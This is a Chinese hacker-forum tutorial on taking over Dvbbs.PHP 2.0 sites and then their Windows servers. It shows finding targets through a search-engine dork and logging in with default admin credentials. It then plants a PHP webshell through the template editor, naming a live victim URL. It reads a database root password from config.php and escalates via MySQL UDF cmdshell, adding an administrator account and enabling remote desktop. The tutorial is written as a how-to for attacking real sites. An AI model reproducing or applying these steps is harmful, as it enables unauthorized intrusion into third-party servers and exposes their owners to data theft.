学习论坛:
www.3800hk.com
www.520hack.com
www.hack58.com
www.hackbase.com
www.hkbase.com.cn
www.3hack.com
以上这些站是本人经常学习的站,希望大家多多去看看。
〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓〓
本人小站:http://bbs.hnxhack.cn 群①:27427625 群②:29930280 本人联系QQ:226404553
大家好,我是黑客永QQ:226404553 本人小站:http://bbs.hnxhack.cn(希望大家多多踩踩,特招聘斑竹与群管理)今天给大家做个教程,php拿网站+服务器提权。。。好了,我就不多打字了,大家看操作。。。。
google.cn搜索关键字:Powered by Dvbbs.PHP 2.0 ?2000 - 2006 Dvbbs.Net 默认管理登陆:用户:admin 密码:admin888
看到了吧!``很多。。。我就不再演示了,大家可以一个一个的试,很多这样的漏洞的,我准备了一个!``
他的全是默认的 用户admin 密码admin888 1、登录成功,现在将转入登录前您访问的页面。 好 进来了。。进后台。。。。
后台也是一样的admin admin888 点外观风格-风格截面模板总管理-新建模板页面-编辑-把自己的php木马放进去。。点保存。。
templates/default/112233.tpl.php 这个是木马地址!``http://www.vistafan.net/templates/default/kiss.tpl.php 我的木马地址。网站的权限我们拿到了,我们现在提权服务器。。。看看有没有开3389,他开了3389,我们就直接提权,大家看好操作。。
找到根目录。点inc文件夹。。找到config.php文件。。。
// ????α?(database server)
$dbhost = 'localhost';
// ????(database name)
$dbname = 'dvbbs';
// ???????(database username)
$dbuser = 'root';
// ?????(database password)
$dbpw = '14130903';
传提权木马。。。
???????File 'C:\Windows\udf.dll' already exists 成功。。。
执行命令成功。。。。我们查一下服务器上的用户!```‘
\\ ?ē?????
-------------------------------------------------------------------------------
Administrator administratorr ASPNET
Discuz_user Guest IIS_IUSER
sadff sdfs sdfsdf
sdfsfd SUPPORT_388945a0
ü??А?????????????????
--------------------------------------------??ɡ
-----------------------------------
查到了吧```` 好像被人入侵过,呵呵。。。 下面我们来添加用户。。
好了,我们来试一下。。。呵呵,提权成功了吧,他服务器人太多,现在进不了,但是可以自己把人T了,现在我就不废话了,教会大家怎么拿php服务器了,,好了,教程结束。有什么不懂的可以去论坛问我。http://bbs.hnxhack.cn
教程结束。。。
C:\Winnt\udf.dll 2000
C:\Windows\udf.dll 2003
现在基本上win的服务器就这两个导出UDF.DLL
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user admins 226404553 /add');
select cmdshell('net localgroup administrators admins /add');
select cmdshell('c:\3389.exe');
drop function cmdshell; 删除函数
select cmdshell('netstat -an');
评论6